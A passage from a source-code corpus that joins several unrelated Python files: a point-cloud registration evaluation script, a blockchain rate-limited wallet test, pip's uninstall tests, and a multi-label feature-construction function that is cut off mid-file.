truth = [] #prepare labels return
fr = open(filename)
index = 0
for line in fr.readlines():
line = line.strip()
# listFromLine = line.split('\t')
listFromLine = line.split()
listFromLine = [float(x) for x in listFromLine]
if(index % 5 ==0):
index = 0
elif(index % 5 ==1):
trans[0, :] = np.array(listFromLine)
elif(index % 5 ==2):
trans[1,:] = np.array(listFromLine)
elif(index % 5 ==3):
trans[2,:] = np.array(listFromLine)
elif(index % 5 ==4):
trans[3,:] = np.array(listFromLine)
truth.append(trans.copy())#这里不用copy的话,,,每个元素都是一样的
index += 1
return truth
if __name__ == '__main__':
root_path = '/Bill/DataSet/RedWood/'
dataset_names = ['loft', 'lobby', 'apartment','bedroom','boardroom']
root_save_path = '/sin_ours/src2ref'
dataset_numbers = [252,199,319,219,243]
for i in range(len(dataset_names)):
# for i in range(1):
file_path = root_path + dataset_names[i]
end = dataset_numbers[i]
save_path = dataset_names[i] + root_save_path
print(file_path)
groud_truth = file2matrix(file_path + '/reg_output.log')
voxel_size = 0.05 # means 5cm for this dataset
err_R = []
err_T = []
trans_all = []
fail_list = []
start = 0
for j in range(start, end):
print(
'j',j
)
# index_src = j + 1
# index_ref = j
index_src = j
index_ref = j + 1
source_show = o3d.io.read_point_cloud(file_path + "/mesh_%s.ply"%(index_src))
target_show = o3d.io.read_point_cloud(file_path + "/mesh_%s.ply"%(index_ref))
filename = file_path + '/xyz_nor_feat_color.npy'
xyz_src, normal_src, feat_src, color_src = get_npy_data(filename, index_src)
xyz_ref, normal_ref, feat_ref, color_ref = get_npy_data(filename, index_ref)
# draw_registration_result(xyz_src, xyz_ref, color_src, color_ref)
# print('feat_src', feat_src.shape, feat_ref.shape)
total_trans = np.eye(4)
# lambda_hybrid = 0.8
lambda_color_ge = 0
fail_flag = 0
for m in range(35):
lambda_hybrid = (np.sin(0.67 * 0.9 ** (m) * 1.68)) ** 2
src_hybrid_feature = np.concatenate(((lambda_hybrid) * feat_src,
((1 - lambda_hybrid) * lambda_color_ge) * color_src,
((1 - lambda_hybrid) * (1 - lambda_color_ge)) * xyz_src), 1)
ref_hybrid_feature = np.concatenate(((lambda_hybrid) * feat_ref,
((1 - lambda_hybrid) * lambda_color_ge) * color_ref,
((1 - lambda_hybrid) * (1 - lambda_color_ge)) * xyz_ref), 1)
# src_hybrid_feature = np.concatenate((np.sqrt(lambda_hybrid) * feat_src, np.sqrt((1-lambda_hybrid) * lambda_color_ge) * color_src, np.sqrt((1-lambda_hybrid) * (1-lambda_color_ge)) * xyz_src), 1)
# ref_hybrid_feature = np.concatenate((np.sqrt(lambda_hybrid) * feat_ref, np.sqrt((1-lambda_hybrid) * lambda_color_ge) * color_ref, np.sqrt((1-lambda_hybrid) * (1-lambda_color_ge)) * xyz_ref), 1)
feat_ref_tree = KDTree(ref_hybrid_feature)
dist_feat, corr = feat_ref_tree.query(src_hybrid_feature, k = 1, return_distance = True)#src 找 tgt里边最近的点,得到的是tgt里面的索引
# print('dist_feat',dist_feat.shape)
corr_xyz_ref = xyz_ref[corr].reshape(-1,3)
corr_xyz_src = xyz_src
distance_threshold = np.sqrt(lambda_hybrid ** 2 * 0.4 + ((1-lambda_hybrid) * lambda_color_ge) ** 2 * 0.3 + ((1 - lambda_hybrid) * (1-lambda_color_ge)) ** 2 * 0.3 )
ref_correct_corr = corr[dist_feat < distance_threshold]#满足距离要求的位置为1,然后再给对应关系,就得到ref中计算的点
ref_correct_xyz = xyz_ref[ref_correct_corr]
ref_correct_normal = normal_ref[ref_correct_corr]
ref_correct_color = color_ref[ref_correct_corr]
if ref_correct_xyz.shape[0] == 0:
fail_flag = 1
continue
src_correct_corr = np.where((np.array(dist_feat < distance_threshold) > 0 ).reshape(-1, 1))[0]#因为src就是从0到n的索引,大于0是取了那些满足要求的位置,所以只需要知道dist_feat的哪个位置满足要求即可
src_correct_xyz = xyz_src[src_correct_corr]
src_correct_normal = normal_src[src_correct_corr]
src_correct_color = color_src[src_correct_corr]
source = PointCloud(src_correct_xyz, src_correct_normal, src_correct_color)
target = PointCloud(ref_correct_xyz, ref_correct_normal, ref_correct_color)
useful_dis = dist_feat[src_correct_corr]#这个距离向量是src和ref的距离,所以取src,假设你src第4个点满足要求,肯定是对应dist_feat中的第四个值嘛
# show_point_cloud(corr_xyz_src, src_correct_xyz, xyz_ref, ref_correct_xyz)
# weights = np.ones(src_correct_xyz.shape[0]).reshape(-1,1)#这里得到的就是满足要求的索引np.sum(np.power((src_correct_color - ref_correct_color), 2), 1).reshape(-1,1) *
weights = np.exp(-useful_dis/0.1).reshape(-1,1)#这里得到的就是满足要求的索引
weights = weights/np.sum(weights)
# print('corr_xyz_ref',i , distance_threshold, ref_correct_corr.shape, xyz_src.shape, xyz_ref.shape, weights.shape,src_correct_corr.shape)
N = src_correct_xyz.shape[0]
corr_src = np.array(range(N)).reshape(N, 1)
corr = np.concatenate((corr_src, corr_src), axis=1)#因为把有效的点都合在一起了
R, t, transform = pt2plTrans(source, target, corr, weights)# 1 - 0.002 * i
xyz_src = (R @ xyz_src.T + t).T
source_show.transform(transform)
lambda_hybrid = 0.9 * lambda_hybrid
total_trans = transform @ total_trans
if fail_flag == 1:
total_trans = np.eye(4)
fail_list.append(j)
print('fail', j)
R = total_trans[:3,:3].reshape(3,3)
t = total_trans[:3,3].reshape(-1,1)
if index_src > index_ref:
err_R.append(np.arccos((np.trace(R.T @ groud_truth[j][:3,:3]) - 1) / 2) * 180 / np.pi )
err_T.append(np.linalg.norm(t - groud_truth[j][:3,3].reshape(-1,1), ord=2,axis=0))
trans_all.append((total_trans))
else:
err_R.append( np.arccos( (np.trace(R @ groud_truth[j][:3,:3] ) - 1) / 2) * 180 / np.pi )
err_T.append(np.linalg.norm(-R.T @ t - groud_truth[j][:3,3].reshape(-1,1), ord=2,axis=0))
trans_all.append((total_trans))
# print(total_trans[:3,:3] @ groud_truth[j][:3,:3], np.trace(total_trans[:3,:3] @ groud_truth[j][:3,:3] - np.eye(3)))
# print(total_trans, groud_truth[j])
print('err_R err_T', err_R[j - start], err_T[j - start],total_trans)
if index_src > index_ref:
#
# location = str(start) + '_' + str(end)
err_all = [err_R, err_T]
plt.figure("ERR_R ref2src") # 图像窗口名称
plt.plot(err_R)
plt.savefig(save_path + '/%s_%s_err_All_ref2src.jpg'%(start, end))
# plt.show()
plt.close()
plt.figure("ERR_T ref2src") # 图像窗口名称
plt.plot(err_T)
plt.savefig(save_path + '/%s_%s_trans_all_ref2src.jpg' % (start, end))
# plt.show()
plt.close()
np.savetxt(save_path + '/%s_%s_fail_list_ref2src.txt'%(start, end), fail_list)
np.save(save_path + '/%s_%s_err_All_ref2src.npy'%(start, end), err_all)
np.savetxt(save_path + '/%s_%s_err_All_ref2src.txt' % (start, end), err_all)
np.save(save_path + '/%s_%s_trans_all_ref2src.npy'%(start, end), trans_all)
np.savetxt(save_path + '/%s_%s_trans_all_ref2src.txt'%(start, end), np.array(trans_all).reshape(-1,4),fmt='%0.8f')
else:
err_all = [err_R, err_T]
plt.figure("ERR_R src2ref") # 图像窗口名称
plt.plot(err_R)
plt.savefig(save_path + '/%s_%serr_All_src2ref.jpg'%(start, end))
# plt.show()
plt.close()
plt.figure("ERR_T src2ref") # 图像窗口名称
plt.plot(err_T)
plt.savefig(save_path + '/%s_%strans_all_src2ref.jpg' % (start, end))
# plt.show()
plt.close()
np.savetxt(save_path + '/%s_%s_fail_list_src2ref.txt'%(start, end), fail_list)
np.savetxt(save_path + '/%s_%serr_All_src2ref.txt' % (start, end), err_all)
np.save(save_path + '/%s_%serr_All_src2ref.npy'%(start, end), err_all)
np.save(save_path + '/%s_%strans_all_src2ref.npy'%(start, end), trans_all)
np.savetxt(save_path + '/%s_%strans_all_src2ref.txt'%(start, end), np.array(trans_all).reshape(-1,4),fmt='%0.8f')
|
the-stack_106_23815 | import asyncio
import pytest
from peas.rpc.wallet_rpc_api import WalletRpcApi
from peas.simulator.simulator_protocol import FarmNewBlockProtocol
from peas.types.blockchain_format.coin import Coin
from peas.types.blockchain_format.sized_bytes import bytes32
from peas.types.mempool_inclusion_status import MempoolInclusionStatus
from peas.types.peer_info import PeerInfo
from peas.util.bech32m import encode_puzzle_hash
from peas.util.ints import uint16
from peas.wallet.util.wallet_types import WalletType
from tests.setup_nodes import self_hostname, setup_simulators_and_wallets
from tests.time_out_assert import time_out_assert
from tests.wallet.sync.test_wallet_sync import wallet_height_at_least
@pytest.fixture(scope="module")
def event_loop():
loop = asyncio.get_event_loop()
yield loop
async def is_transaction_in_mempool(user_wallet_id, api, tx_id: bytes32) -> bool:
try:
val = await api.get_transaction({"wallet_id": user_wallet_id, "transaction_id": tx_id.hex()})
except ValueError:
return False
for _, mis, _ in val["transaction"].sent_to:
if (
MempoolInclusionStatus(mis) == MempoolInclusionStatus.SUCCESS
or MempoolInclusionStatus(mis) == MempoolInclusionStatus.PENDING
):
return True
return False
async def is_transaction_confirmed(user_wallet_id, api, tx_id: bytes32) -> bool:
try:
val = await api.get_transaction({"wallet_id": user_wallet_id, "transaction_id": tx_id.hex()})
except ValueError:
return False
return val["transaction"].confirmed
async def check_balance(api, wallet_id):
balance_response = await api.get_wallet_balance({"wallet_id": wallet_id})
balance = balance_response["wallet_balance"]["confirmed_wallet_balance"]
return balance
class TestRLWallet:
@pytest.fixture(scope="function")
async def three_wallet_nodes(self):
async for _ in setup_simulators_and_wallets(1, 3, {}):
yield _
@pytest.mark.asyncio
async def test_create_rl_coin(self, three_wallet_nodes):
num_blocks = 4
full_nodes, wallets = three_wallet_nodes
full_node_api = full_nodes[0]
full_node_server = full_node_api.server
wallet_node, server_2 = wallets[0]
wallet_node_1, wallet_server_1 = wallets[1]
wallet_node_2, wallet_server_2 = wallets[2]
wallet = wallet_node.wallet_state_manager.main_wallet
ph = await wallet.get_new_puzzlehash()
await server_2.start_client(PeerInfo(self_hostname, uint16(full_node_server._port)), None)
await wallet_server_1.start_client(PeerInfo(self_hostname, uint16(full_node_server._port)), None)
await wallet_server_2.start_client(PeerInfo(self_hostname, uint16(full_node_server._port)), None)
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(ph))
for i in range(0, num_blocks + 1):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(32 * b"\0"))
await time_out_assert(15, wallet_height_at_least, True, wallet_node, 6)
fund_owners_initial_balance = await wallet.get_confirmed_balance()
api_user = WalletRpcApi(wallet_node_1)
val = await api_user.create_new_wallet(
{"wallet_type": "rl_wallet", "rl_type": "user", "host": f"{self_hostname}:5000"}
)
assert isinstance(val, dict)
if "success" in val:
assert val["success"]
assert val["id"]
assert val["type"] == WalletType.RATE_LIMITED.value
user_wallet_id = val["id"]
pubkey = val["pubkey"]
api_admin = WalletRpcApi(wallet_node)
val = await api_admin.create_new_wallet(
{
"wallet_type": "rl_wallet",
"rl_type": "admin",
"interval": 2,
"limit": 10,
"pubkey": pubkey,
"amount": 100,
"fee": 1,
"host": f"{self_hostname}:5000",
}
)
assert isinstance(val, dict)
if "success" in val:
assert val["success"]
assert val["id"]
assert val["type"] == WalletType.RATE_LIMITED.value
assert val["origin"]
assert val["pubkey"]
admin_wallet_id = val["id"]
admin_pubkey = val["pubkey"]
origin: Coin = val["origin"]
await api_user.rl_set_user_info(
{
"wallet_id": user_wallet_id,
"interval": 2,
"limit": 10,
"origin": {
"parent_coin_info": origin.parent_coin_info.hex(),
"puzzle_hash": origin.puzzle_hash.hex(),
"amount": origin.amount,
},
"admin_pubkey": admin_pubkey,
}
)
assert (await api_user.get_wallet_balance({"wallet_id": user_wallet_id}))["wallet_balance"][
"confirmed_wallet_balance"
] == 0
for i in range(0, 2 * num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(32 * b"\0"))
await time_out_assert(15, wallet_height_at_least, True, wallet_node, 14)
assert await wallet.get_confirmed_balance() == fund_owners_initial_balance - 101
assert await check_balance(api_user, user_wallet_id) == 100
receiving_wallet = wallet_node_2.wallet_state_manager.main_wallet
address = encode_puzzle_hash(await receiving_wallet.get_new_puzzlehash(), "pea")
assert await receiving_wallet.get_spendable_balance() == 0
val = await api_user.send_transaction({"wallet_id": user_wallet_id, "amount": 3, "fee": 2, "address": address})
assert "transaction_id" in val
await time_out_assert(15, is_transaction_in_mempool, True, user_wallet_id, api_user, val["transaction_id"])
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(32 * b"\0"))
await time_out_assert(15, wallet_height_at_least, True, wallet_node, 18)
assert await is_transaction_confirmed(user_wallet_id, api_user, val["transaction_id"])
assert await check_balance(api_user, user_wallet_id) == 95
assert await receiving_wallet.get_spendable_balance() == 3
val = await api_admin.add_rate_limited_funds({"wallet_id": admin_wallet_id, "amount": 100, "fee": 7})
assert val["status"] == "SUCCESS"
for i in range(0, 50):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(32 * b"\0"))
await time_out_assert(15, wallet_height_at_least, True, wallet_node, 68)
assert await check_balance(api_user, user_wallet_id) == 195
# test spending
puzzle_hash = encode_puzzle_hash(await receiving_wallet.get_new_puzzlehash(), "pea")
val = await api_user.send_transaction(
{"wallet_id": user_wallet_id, "amount": 105, "fee": 0, "address": puzzle_hash}
)
await time_out_assert(15, is_transaction_in_mempool, True, user_wallet_id, api_user, val["transaction_id"])
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(32 * b"\0"))
await time_out_assert(15, wallet_height_at_least, True, wallet_node, 72)
assert await is_transaction_confirmed(user_wallet_id, api_user, val["transaction_id"])
assert await check_balance(api_user, user_wallet_id) == 90
assert await receiving_wallet.get_spendable_balance() == 108
val = await api_admin.send_clawback_transaction({"wallet_id": admin_wallet_id, "fee": 11})
await time_out_assert(15, is_transaction_in_mempool, True, user_wallet_id, api_admin, val["transaction_id"])
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(32 * b"\0"))
await time_out_assert(15, wallet_height_at_least, True, wallet_node, 76)
assert await is_transaction_confirmed(user_wallet_id, api_admin, val["transaction_id"])
assert await check_balance(api_user, user_wallet_id) == 0
final_balance = await wallet.get_confirmed_balance()
assert final_balance == fund_owners_initial_balance - 129
|
the-stack_106_23816 | from __future__ import with_statement
import json
import logging
import os
import sys
import textwrap
from os.path import join, normpath
from tempfile import mkdtemp
import pretend
import pytest
from pip._internal.req.constructors import install_req_from_line
from pip._internal.utils.misc import rmtree
from tests.lib import (
assert_all_changes,
create_test_package_with_setup,
need_svn,
)
from tests.lib.local_repos import local_checkout, local_repo
@pytest.mark.network
def test_basic_uninstall(script):
"""
Test basic install and uninstall.
"""
result = script.pip('install', 'INITools==0.2')
assert join(script.site_packages, 'initools') in result.files_created, (
sorted(result.files_created.keys())
)
# the import forces the generation of __pycache__ if the version of python
# supports it
script.run('python', '-c', "import initools")
result2 = script.pip('uninstall', 'INITools', '-y')
assert_all_changes(result, result2, [script.venv / 'build', 'cache'])
def test_basic_uninstall_distutils(script):
"""
Test basic install and uninstall.
"""
script.scratch_path.joinpath("distutils_install").mkdir()
pkg_path = script.scratch_path / 'distutils_install'
pkg_path.joinpath("setup.py").write_text(textwrap.dedent("""
from distutils.core import setup
setup(
name='distutils-install',
version='0.1',
)
"""))
result = script.run('python', pkg_path / 'setup.py', 'install')
result = script.pip('list', '--format=json')
assert {"name": "distutils-install", "version": "0.1"} \
in json.loads(result.stdout)
result = script.pip('uninstall', 'distutils_install', '-y',
expect_stderr=True, expect_error=True)
assert (
"Cannot uninstall 'distutils-install'. It is a distutils installed "
"project and thus we cannot accurately determine which files belong "
"to it which would lead to only a partial uninstall."
) in result.stderr
@pytest.mark.network
def test_basic_uninstall_with_scripts(script):
"""
Uninstall an easy_installed package with scripts.
"""
result = script.easy_install('PyLogo', expect_stderr=True)
easy_install_pth = script.site_packages / 'easy-install.pth'
pylogo = sys.platform == 'win32' and 'pylogo' or 'PyLogo'
assert(pylogo in result.files_updated[easy_install_pth].bytes)
result2 = script.pip('uninstall', 'pylogo', '-y')
assert_all_changes(
result,
result2,
[script.venv / 'build', 'cache', easy_install_pth],
)
@pytest.mark.network
def test_uninstall_easy_install_after_import(script):
"""
Uninstall an easy_installed package after it's been imported
"""
result = script.easy_install('--always-unzip', 'INITools==0.2',
expect_stderr=True)
# the import forces the generation of __pycache__ if the version of python
# supports it
script.run('python', '-c', "import initools")
result2 = script.pip('uninstall', 'INITools', '-y')
assert_all_changes(
result,
result2,
[
script.venv / 'build',
'cache',
script.site_packages / 'easy-install.pth',
]
)
@pytest.mark.network
def test_uninstall_trailing_newline(script):
"""
Uninstall behaves appropriately if easy-install.pth
lacks a trailing newline
"""
script.easy_install('INITools==0.2', expect_stderr=True)
script.easy_install('PyLogo', expect_stderr=True)
easy_install_pth = script.site_packages_path / 'easy-install.pth'
# trim trailing newline from easy-install.pth
with open(easy_install_pth) as f:
pth_before = f.read()
with open(easy_install_pth, 'w') as f:
f.write(pth_before.rstrip())
# uninstall initools
script.pip('uninstall', 'INITools', '-y')
with open(easy_install_pth) as f:
pth_after = f.read()
# verify that only initools is removed
before_without_initools = [
line for line in pth_before.splitlines()
if 'initools' not in line.lower()
]
lines_after = pth_after.splitlines()
assert lines_after == before_without_initools
@pytest.mark.network
def test_basic_uninstall_namespace_package(script):
"""
Uninstall a distribution with a namespace package without clobbering
the namespace and everything in it.
"""
result = script.pip('install', 'pd.requires==0.0.3')
assert join(script.site_packages, 'pd') in result.files_created, (
sorted(result.files_created.keys())
)
result2 = script.pip('uninstall', 'pd.find', '-y')
assert join(script.site_packages, 'pd') not in result2.files_deleted, (
sorted(result2.files_deleted.keys())
)
assert join(script.site_packages, 'pd', 'find') in result2.files_deleted, (
sorted(result2.files_deleted.keys())
)
def test_uninstall_overlapping_package(script, data):
"""
Uninstalling a distribution that adds modules to a pre-existing package
should only remove those added modules, not the rest of the existing
package.
See: GitHub issue #355 (pip uninstall removes things it didn't install)
"""
parent_pkg = data.packages.joinpath("parent-0.1.tar.gz")
child_pkg = data.packages.joinpath("child-0.1.tar.gz")
result1 = script.pip('install', parent_pkg)
assert join(script.site_packages, 'parent') in result1.files_created, (
sorted(result1.files_created.keys())
)
result2 = script.pip('install', child_pkg)
assert join(script.site_packages, 'child') in result2.files_created, (
sorted(result2.files_created.keys())
)
assert normpath(
join(script.site_packages, 'parent/plugins/child_plugin.py')
) in result2.files_created, sorted(result2.files_created.keys())
# The import forces the generation of __pycache__ if the version of python
# supports it
script.run('python', '-c', "import parent.plugins.child_plugin, child")
result3 = script.pip('uninstall', '-y', 'child')
assert join(script.site_packages, 'child') in result3.files_deleted, (
sorted(result3.files_created.keys())
)
assert normpath(
join(script.site_packages, 'parent/plugins/child_plugin.py')
) in result3.files_deleted, sorted(result3.files_deleted.keys())
assert join(script.site_packages, 'parent') not in result3.files_deleted, (
sorted(result3.files_deleted.keys())
)
# Additional check: uninstalling 'child' should return things to the
# previous state, without unintended side effects.
assert_all_changes(result2, result3, [])
@pytest.mark.parametrize("console_scripts",
["test_ = distutils_install",
"test_:test_ = distutils_install"])
def test_uninstall_entry_point_colon_in_name(script, console_scripts):
"""
Test uninstall package with two or more entry points in the same section,
whose name contain a colon.
"""
pkg_name = 'ep_install'
pkg_path = create_test_package_with_setup(
script,
name=pkg_name,
version='0.1',
entry_points={"console_scripts": [console_scripts, ],
"pip_test.ep":
["ep:name1 = distutils_install",
"ep:name2 = distutils_install"]
}
)
script_name = script.bin_path.joinpath(
console_scripts.split('=')[0].strip()
)
if sys.platform == 'win32':
script_name += '.exe'
result = script.pip('install', pkg_path)
assert script_name.exists()
result = script.pip('list', '--format=json')
assert {"name": "ep-install", "version": "0.1"} \
in json.loads(result.stdout)
script.pip('uninstall', 'ep_install', '-y')
assert not script_name.exists()
result2 = script.pip('list', '--format=json')
assert {"name": "ep-install", "version": "0.1"} \
not in json.loads(result2.stdout)
def test_uninstall_gui_scripts(script):
"""
Make sure that uninstall removes gui scripts
"""
pkg_name = "gui_pkg"
pkg_path = create_test_package_with_setup(
script,
name=pkg_name,
version='0.1',
entry_points={"gui_scripts": ["test_ = distutils_install", ], }
)
script_name = script.bin_path.joinpath('test_')
if sys.platform == 'win32':
script_name += '.exe'
script.pip('install', pkg_path)
assert script_name.exists()
script.pip('uninstall', pkg_name, '-y')
assert not script_name.exists()
def test_uninstall_console_scripts(script):
"""
Test uninstalling a package with more files (console_script entry points,
extra directories).
"""
pkg_path = create_test_package_with_setup(
script,
name='discover',
version='0.1',
entry_points={'console_scripts': ['discover = discover:main']},
)
result = script.pip('install', pkg_path)
assert script.bin / 'discover' + script.exe in result.files_created, (
sorted(result.files_created.keys())
)
result2 = script.pip('uninstall', 'discover', '-y')
assert_all_changes(result, result2, [script.venv / 'build', 'cache'])
def test_uninstall_console_scripts_uppercase_name(script):
"""
Test uninstalling console script with uppercase character.
"""
pkg_path = create_test_package_with_setup(
script,
name='ep_install',
version='0.1',
entry_points={
"console_scripts": [
"Test = distutils_install",
],
},
)
script_name = script.bin_path.joinpath('Test' + script.exe)
script.pip('install', pkg_path)
assert script_name.exists()
script.pip('uninstall', 'ep_install', '-y')
assert not script_name.exists()
@pytest.mark.network
def test_uninstall_easy_installed_console_scripts(script):
"""
Test uninstalling package with console_scripts that is easy_installed.
"""
# setuptools >= 42.0.0 deprecates easy_install and prints a warning when
# used
result = script.easy_install('discover', allow_stderr_warning=True)
assert script.bin / 'discover' + script.exe in result.files_created, (
sorted(result.files_created.keys())
)
result2 = script.pip('uninstall', 'discover', '-y')
assert_all_changes(
result,
result2,
[
script.venv / 'build',
'cache',
script.site_packages / 'easy-install.pth',
]
)
@pytest.mark.network
@need_svn
def test_uninstall_editable_from_svn(script, tmpdir):
"""
Test uninstalling an editable installation from svn.
"""
result = script.pip(
'install', '-e',
'{checkout}#egg=initools'.format(
checkout=local_checkout(
'svn+http://svn.colorstudy.com/INITools', tmpdir)
),
)
result.assert_installed('INITools')
result2 = script.pip('uninstall', '-y', 'initools')
assert (script.venv / 'src' / 'initools' in result2.files_after)
assert_all_changes(
result,
result2,
[
script.venv / 'src',
script.venv / 'build',
script.site_packages / 'easy-install.pth'
],
)
@pytest.mark.network
def test_uninstall_editable_with_source_outside_venv(script, tmpdir):
"""
Test uninstalling editable install from existing source outside the venv.
"""
try:
temp = mkdtemp()
temp_pkg_dir = join(temp, 'pip-test-package')
_test_uninstall_editable_with_source_outside_venv(
script,
tmpdir,
temp_pkg_dir,
)
finally:
rmtree(temp)
def _test_uninstall_editable_with_source_outside_venv(
script, tmpdir, temp_pkg_dir,
):
result = script.run(
'git', 'clone',
local_repo('git+git://github.com/pypa/pip-test-package', tmpdir),
temp_pkg_dir,
expect_stderr=True,
)
result2 = script.pip('install', '-e', temp_pkg_dir)
assert join(
script.site_packages, 'pip-test-package.egg-link'
) in result2.files_created, list(result2.files_created.keys())
result3 = script.pip('uninstall', '-y', 'pip-test-package')
assert_all_changes(
result,
result3,
[script.venv / 'build', script.site_packages / 'easy-install.pth'],
)
@pytest.mark.network
@need_svn
def test_uninstall_from_reqs_file(script, tmpdir):
"""
Test uninstall from a requirements file.
"""
local_svn_url = local_checkout(
'svn+http://svn.colorstudy.com/INITools', tmpdir,
)
script.scratch_path.joinpath("test-req.txt").write_text(
textwrap.dedent("""
-e {url}#egg=initools
# and something else to test out:
PyLogo<0.4
""").format(url=local_svn_url)
)
result = script.pip('install', '-r', 'test-req.txt')
script.scratch_path.joinpath("test-req.txt").write_text(
textwrap.dedent("""
# -f, -i, and --extra-index-url should all be ignored by uninstall
-f http://www.example.com
-i http://www.example.com
--extra-index-url http://www.example.com
-e {url}#egg=initools
# and something else to test out:
PyLogo<0.4
""").format(url=local_svn_url)
)
result2 = script.pip('uninstall', '-r', 'test-req.txt', '-y')
assert_all_changes(
result,
result2,
[
script.venv / 'build',
script.venv / 'src',
script.scratch / 'test-req.txt',
script.site_packages / 'easy-install.pth',
],
)
def test_uninstallpathset_no_paths(caplog):
"""
Test UninstallPathSet logs notification when there are no paths to
uninstall
"""
from pip._internal.req.req_uninstall import UninstallPathSet
from pkg_resources import get_distribution
caplog.set_level(logging.INFO)
test_dist = get_distribution('pip')
uninstall_set = UninstallPathSet(test_dist)
uninstall_set.remove() # with no files added to set
assert (
"Can't uninstall 'pip'. No files were found to uninstall."
in caplog.text
)
def test_uninstall_non_local_distutils(caplog, monkeypatch, tmpdir):
einfo = tmpdir.joinpath("thing-1.0.egg-info")
with open(einfo, "wb"):
pass
dist = pretend.stub(
key="thing",
project_name="thing",
egg_info=einfo,
location=einfo,
_provider=pretend.stub(),
)
get_dist = pretend.call_recorder(lambda x: dist)
monkeypatch.setattr("pip._vendor.pkg_resources.get_distribution", get_dist)
req = install_req_from_line("thing")
req.uninstall()
assert os.path.exists(einfo)
def test_uninstall_wheel(script, data):
"""
Test uninstalling a wheel
"""
package = data.packages.joinpath("simple.dist-0.1-py2.py3-none-any.whl")
result = script.pip('install', package, '--no-index')
dist_info_folder = script.site_packages / 'simple.dist-0.1.dist-info'
assert dist_info_folder in result.files_created
result2 = script.pip('uninstall', 'simple.dist', '-y')
assert_all_changes(result, result2, [])
@pytest.mark.skipif("sys.platform == 'win32'")
def test_uninstall_with_symlink(script, data, tmpdir):
"""
Test uninstalling a wheel, with an additional symlink
https://github.com/pypa/pip/issues/6892
"""
package = data.packages.joinpath("simple.dist-0.1-py2.py3-none-any.whl")
script.pip('install', package, '--no-index')
symlink_target = tmpdir / "target"
symlink_target.mkdir()
symlink_source = script.site_packages / "symlink"
(script.base_path / symlink_source).symlink_to(symlink_target)
st_mode = symlink_target.stat().st_mode
distinfo_path = script.site_packages_path / 'simple.dist-0.1.dist-info'
record_path = distinfo_path / 'RECORD'
with open(record_path, "a") as f:
f.write("symlink,,\n")
uninstall_result = script.pip('uninstall', 'simple.dist', '-y')
assert symlink_source in uninstall_result.files_deleted
assert symlink_target.stat().st_mode == st_mode
def test_uninstall_setuptools_develop_install(script, data):
"""Try uninstall after setup.py develop followed of setup.py install"""
pkg_path = data.packages.joinpath("FSPkg")
script.run('python', 'setup.py', 'develop',
expect_stderr=True, cwd=pkg_path)
script.run('python', 'setup.py', 'install',
expect_stderr=True, cwd=pkg_path)
list_result = script.pip('list', '--format=json')
assert {"name": os.path.normcase("FSPkg"), "version": "0.1.dev0"} \
in json.loads(list_result.stdout), str(list_result)
# Uninstall both develop and install
uninstall = script.pip('uninstall', 'FSPkg', '-y')
assert any(filename.endswith('.egg')
for filename in uninstall.files_deleted.keys())
uninstall2 = script.pip('uninstall', 'FSPkg', '-y')
assert join(
script.site_packages, 'FSPkg.egg-link'
) in uninstall2.files_deleted, list(uninstall2.files_deleted.keys())
list_result2 = script.pip('list', '--format=json')
assert "FSPkg" not in {p["name"] for p in json.loads(list_result2.stdout)}
def test_uninstall_editable_and_pip_install(script, data):
"""Try uninstall after pip install -e after pip install"""
# SETUPTOOLS_SYS_PATH_TECHNIQUE=raw removes the assumption that `-e`
# installs are always higher priority than regular installs.
# This becomes the default behavior in setuptools 25.
script.environ['SETUPTOOLS_SYS_PATH_TECHNIQUE'] = 'raw'
pkg_path = data.packages.joinpath("FSPkg")
script.pip('install', '-e', '.',
expect_stderr=True, cwd=pkg_path)
# ensure both are installed with --ignore-installed:
script.pip('install', '--ignore-installed', '.',
expect_stderr=True, cwd=pkg_path)
list_result = script.pip('list', '--format=json')
assert {"name": "FSPkg", "version": "0.1.dev0"} \
in json.loads(list_result.stdout)
# Uninstall both develop and install
uninstall = script.pip('uninstall', 'FSPkg', '-y')
assert not any(filename.endswith('.egg-link')
for filename in uninstall.files_deleted.keys())
uninstall2 = script.pip('uninstall', 'FSPkg', '-y')
assert join(
script.site_packages, 'FSPkg.egg-link'
) in uninstall2.files_deleted, list(uninstall2.files_deleted.keys())
list_result2 = script.pip('list', '--format=json')
assert "FSPkg" not in {p["name"] for p in json.loads(list_result2.stdout)}
def test_uninstall_ignores_missing_packages(script, data):
"""Uninstall of a non existent package prints a warning and exits cleanly
"""
result = script.pip(
'uninstall', '-y', 'non-existent-pkg', expect_stderr=True,
)
assert "Skipping non-existent-pkg as it is not installed." in result.stderr
assert result.returncode == 0, "Expected clean exit"
def test_uninstall_ignores_missing_packages_and_uninstalls_rest(script, data):
script.pip_install_local('simple')
result = script.pip(
'uninstall', '-y', 'non-existent-pkg', 'simple', expect_stderr=True,
)
assert "Skipping non-existent-pkg as it is not installed." in result.stderr
assert "Successfully uninstalled simple" in result.stdout
assert result.returncode == 0, "Expected clean exit"
|
the-stack_106_23818 | import numpy as np
import torch.utils.data as Data
import torch
from sklearn.decomposition import PCA
import numpy as np
import torch.utils.data as Data
from scipy.special import comb # 排列组合中的组合公式
def f_k(dataSet, Labels, d, q):
"""
:param dataSet: 某一个样本的特征集
:param Labels: 某一个样本的标签集
:param d: 样本的维度,即一个样本含有的特征数
:param q: 标签的维度,即标签集中标签的个数
:return: 返回的是fk(x,y)
"""
F_k = []
for l in range(d):
for j in range(q):
if Labels[j] == 1:
try:
F_k.append(float(dataSet[l]))
except:
# print(dataSet)
# print(l, dataSet)
raise IndexError
else:
F_k.append(0.0)
for j1 in range(q - 1):
for j2 in range(j1 + 1, q):
y_j1 = Labels[j1]
y_j2 = Labels[j2]
if y_j1 == 1 and y_j2 == 1:
F_k.append(1.0)
else:
F_k.append(0.0)
if y_j1 == 1 and y_j2 == 0:
F_k.append(1.0)
else:
F_k.append(0.0)
if y_j1 == 0 and y_j2 == 1:
F_k.append(1.0)
else:
F_k.append(0.0)
if y_j1 == 0 and y_j2 == 0:
F_k.append(1.0)
else:
F_k.append(0.0)
# print(len(F_k))
return torch.tensor(F_k, requires_grad=True)
def basic_rand_labels(len):
"""
变成辅助函数
